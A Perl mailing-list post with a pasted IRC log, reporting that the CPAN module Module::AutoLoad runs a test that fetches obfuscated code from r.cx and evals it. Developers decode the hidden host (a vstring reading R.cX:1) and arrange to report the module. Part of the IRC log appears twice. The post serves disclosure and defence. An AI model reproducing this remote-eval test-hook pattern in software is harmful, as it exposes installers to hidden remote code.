develooper Front page | perl.modules | Postings from July 2020

Malicious module on CPAN

Thread Next
From:
Ryan Voots
Date:
July 28, 2020 02:07
Subject:
Malicious module on CPAN
Message ID:
CA+sVJXmWtWz-qHwbw=8iBExrHcKqyVqQW3jg7CBynwuoxtXmzg@mail.gmail.com
Not found by me but I'm not sure if anyone else has reported this yet.  It
was discussed in magnet#toolchain earlier today and brought forth by mst on
who to contact about it.

It looks like Module::AutoLoad is running malicious code fetched from
http://r.cx/, it might have originally been non-malicious but it appears to
either be some kind of rootkit or iphone jailbreak or something currently.

The trigger itself seems to be this test running:
https://metacpan.org/source/BBB/Module-AutoLoad-0.06/t/05_rcx.t

This appears to have been known about for a few years by some people but
it's the first I'm seeing about it:
https://stackoverflow.com/questions/35212843/perl-understanding-botstrap

Below is the entire conversation from IRC about the discovery


adsf
18:17:47 < haarg> regarding potentially malicious code on cpan
18:17:49 < haarg>
https://metacpan.org/source/BBB/Module-AutoLoad-0.06/t/05_rcx.t
18:18:40 < Grinnz> oh god
18:19:02 < haarg> let me know if you figure out what it does
18:19:17 < Grinnz> i've figured out enough to wonder what the fuck this is
doing here
18:19:32 < ether> what it *wants* to do is take the location of the current
.t file, go up one dir and find contrib/RCX.pl and then run that script
18:19:32 < haarg> it's like 5 steps of insanity, most of which involve
evaling code read straight off a random internet server
18:19:45 < haarg> yeah, now look at that script
18:19:47 < Grinnz> ether: yeah that script is where the scary part starts
18:20:26  * ether ಠ_ಠ
18:20:27 < Grinnz> also: 82.46.99.88.":1"
18:20:43 < Grinnz> ... this is concatenating a vstring with a string
18:20:48 < Grinnz> how would that ever work
18:21:14 < ether> I wonder what used to be at 82.46.99.88
18:22:09 < haarg> https://perlbot.pl/p/1133d2
18:22:29 < ether> he's up front about it being black magic in the docs
18:22:35 < ether> but this shit should have never been put on cpan
18:22:55 < Grinnz> "botstrap" is also cute
18:23:03 < haarg> it's not just "black magic" it's "active remote exploit"
18:23:52 < Grinnz> mst / klapperl ^
18:24:06 < haarg> this is the eval: https://perlbot.pl/p/ui358q
18:24:12 < veesh> wow, that is not acceptable
18:24:17 < haarg> the unpack i mean
18:25:24 < haarg> next step: https://perlbot.pl/p/o1lk67
18:26:15 < haarg> next step: https://perlbot.pl/p/gkoxmt
18:26:52 < Grinnz> fyi that has been there since the first release of that
dist in 2011
18:27:10 < Grinnz> though with different ips
18:30:03 < ether> 82.46.99.88.":1" = R.cX:1
18:30:11 < Grinnz> oh dear god
18:30:22 < Grinnz> so it's a vstring and not an ip at all
18:30:23 < ether> what does IO::Socket::INET do with that? is :1 a port
number?
18:30:26 < Grinnz> yes
18:30:49 < ether> I missed haarg's first paste, https://perlbot.pl/p/1133d2
- that makes it more clear :)
18:30:56 < ether> jfc
18:31:08 < ether> burn it with fire
18:31:29 < haarg> i haven't traced the next step because it's pain to
decode without running the whole thing
18:33:07 < veesh>
https://stackoverflow.com/questions/35212843/perl-understanding-botstrap
18:35:21 < ether> I wonder if those guys ever did report this to
modules@perl.org
18:35:25 < ether> narrator: they did not.
18:36:12 < ether> I don't see how r.cx could have been hacked and these
eval chains still work
18:36:17 < ether> therefore, this was all intentional
18:36:29 < ether> burn it all down and bury this guy at sea
18:36:42 < ether> mst: would you agree?
18:38:44 < veesh> i just noticed now that the OP on the SO question was
asking how to port the code to python
18:39:00 < veesh> i'm glad that all those people left perl 20 years ago
18:43:10  * Grinnz commented on the SO answer with some non-malicious
solutions to this problem
18:44:59  * ether flagged for moderator attention to get it taken down
18:45:56 < haarg> i'm not having any luck tracing what the code does
further than what i posted so far
18:46:07 < haarg> i need a VM or something
18:30:56 < ether> jfc
18:31:08 < ether> burn it with fire
18:31:29 < haarg> i haven't traced the next step because it's pain to
decode without running the whole thing
18:33:07 < veesh>
https://stackoverflow.com/questions/35212843/perl-understanding-botstrap
18:35:21 < ether> I wonder if those guys ever did report this to
modules@perl.org
18:35:25 < ether> narrator: they did not.
18:36:12 < ether> I don't see how r.cx could have been hacked and these
eval chains still work
18:36:17 < ether> therefore, this was all intentional
18:36:29 < ether> burn it all down and bury this guy at sea
18:36:42 < ether> mst: would you agree?
18:38:44 < veesh> i just noticed now that the OP on the SO question was
asking how to port the code to python
18:39:00 < veesh> i'm glad that all those people left perl 20 years ago
18:43:10  * Grinnz commented on the SO answer with some non-malicious
solutions to this problem
18:44:59  * ether flagged for moderator attention to get it taken down
18:45:56 < haarg> i'm not having any luck tracing what the code does
further than what i posted so far
18:46:07 < haarg> i need a VM or something
18:47:11 < veesh> docker sounds like a good choice?
18:47:20 < Grinnz> sounds like a job for simcop2387
18:57:15 < ether> I tried searching for those tags - SHAtter GreenPois0n
@GeoHot - but got lost in a spiral of l33tsp33k and had to lie down
19:03:01 -!- Pali [~pali@ip-89-102-255-175.net.upcbroadband.cz] has quit
[Ping timeout: 360 seconds]
19:03:15 -!- brunoramos_ [~brunoramo@94.252.122.216] has joined #toolchain
19:05:55 -!- brunoramos [~brunoramo@94.252.122.22] has quit [Ping timeout:
360 seconds]
19:05:55 -!- brunoramos_ is now known as brunoramos
19:35:45 < Grinnz> http://neilb.org/2020/07/24/inconsistent-permissions.html
- looks like the usual use of AUTHORITY is done by default now, neat
19:35:46 < dipsy> [ Inconsistent permissions on CPAN modules ]
19:35:49 < simcop2387> Grinnz: haarg: hrm?
19:36:20 < Grinnz> simcop2387: attempting to figure out what some malicious
code does
19:36:58 < simcop2387> oh fun, yea the pastebin is hopefully nice for that,
but it's one reason why i refuse to do a full cpan test run until i get a
proper sandbox for it setup
19:38:30 < simcop2387> it looks almost like the EFI stuff in modern UEFI
systems? like it's trying to load something into the vars there?
19:38:48 < simcop2387> or maybe it's just pretending to do so
19:39:34 < stigo> seems like a distraction to me, GreenPois0n pops up an
old ios jailbrak for instance.
19:40:16 < simcop2387> yea after reading the rest of the links it looks
like it's loading an iphone jail break of some kind.  possibly to infect
any attached devices
19:40:32 < Grinnz> it seems to me like the guy typed in "how to rootkit for
noobs" in google and attached his code to that
19:40:47 < simcop2387> maybe
19:43:29 < stigo> almost like a ctf, interesting that r.cx:1 doesn't close
the socket after delivering the first code part.
19:52:57 < stigo> some of r.cx's zone file: https://tpaste.us/ql09
20:17:25 < stigo> aha, this seems to be the tool used:
http://www.perlobfuscator.com
20:17:26 < dipsy> [ Free Perl Obfuscator ]
20:23:20 < Grinnz> oh god
20:24:27 -!- haj [~Thunderbi@ip5f5ac614.dynamic.kabel-deutschland.de] has
quit [Quit: haj]
20:27:21 < mohawk> at the bottom it offers a de-obfuscator
20:43:55 < simcop2387> stigo++
21:40:17 < mst> yeah, somebody email module@perl.org, klapperl@cpan.org
please
21:41:13 < simcop2387> if no one has done it yet, i'll do it shortly.
21:41:20 < mst> cheers
21:41:31 < simcop2387> i need to do some dishes and hand feed the cat first
though
21:41:34 < mst> up to eyeballs in something else, would prefer somebody who
was paying attention to do so
21:41:40 < mst> aye, fair

Thread Next


nntp.perl.org: Perl Programming lists via nntp and http.
Comments to Ask Bjørn Hansen at ask@perl.org | Group listing | About